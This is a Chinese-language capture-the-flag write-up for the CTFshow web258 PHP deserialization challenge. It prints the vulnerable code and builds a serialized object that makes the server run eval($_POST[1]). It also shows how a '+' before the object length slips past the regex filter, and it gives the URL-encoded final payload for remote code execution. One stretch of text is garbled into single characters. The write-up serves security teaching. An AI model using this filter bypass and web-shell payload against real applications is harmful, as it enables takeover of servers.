CTFSHOW web258
反序列化
正则匹配
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=false;
public $class = 'info';
public function __construct(){
$this->class=new info();
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function __destruct(){
$this->class->getInfo();
}
}
class info{
public $user='xxxxxx';
public function getInfo(){
return $this->user;
}
}
class backDoor{
public $code;
public function getInfo(){
eval($this->code);
}
}
$username=$_GET['username'];
$password=$_GET['password'];
if(isset($username) && isset($password)){
if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
$user = unserialize($_COOKIE['user']);
}
$user->login($username,$password);
}
这题很明显的发现 backDoor 里的getInfo 有任意代码执行函数所以就要想办法调用他来实现cat flag
if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
$user = unserialize($_COOKIE['user']);
}
这里用到反序列化unserialize()
public function __construct(){
$this->class=new info();
}
public function __destruct(){
$this->class->getInfo();
}
魔术方法
construct 是创建类时自动调用
这里我们可以将 info()改为backDoor() 来实现backDoor()的自动创建
当脚本运行结束之前又会调用__destruct()函数来实现任意代码的执行
所以这里要将
c
o
d
e
改
为
我
们
要
执
行
的
代
码
这
里
我
们
改
为
e
v
a
l
(
code 改为我们要执行的代码这里我们改为eval(
code改为我们要执行的代码这里我们改为eval($_POST[1]);
下面来构造payload
class ctfShowUser{
public function __construct(){
$this->class=new backDoor();
}
public function __destruct(){
$this->class->getInfo();
}
}
class backDoor{
public $code='eval($_POST[1]);';
public function getInfo(){
eval($this->code);
}
}
echo serialize(new ctfShowUser());
#O:11:"ctfShowUser":1:{s:5:"class";O:8:"backDoor":1:{s:4:"code";s:16:"eval($_POST[1]);";}}
if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
$user = unserialize($_COOKIE['user']);
}
这里还有一个正则过滤
[oc] 匹配o 或 c
\d 匹配数字
/i 表示任意大小写
中间还有两个:匹配
这里可以直接在数字前面加个+绕过
O:+11:“ctfShowUser”:1:{s:5:“class”;O:+8:“backDoor”:1:{s:4:“code”;s:16:“eval($_POST[1]);”;}}
然后urlebcode 编码 得到payload
O%3A%2B11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22class%22%3BO%3A%2B8%3A%22backDoor%22%3A1%3A%7Bs%3A4%3A%22code%22%3Bs%3A16%3A%22eval%28%24_POST%5B1%5D%29%3B%22%3B%7D%7D
这里没有用password 和username 是因为在login 函数里 只是进行了判断返回一个判断值不会影响反序列化的结果
最后通过修改POST来rce即可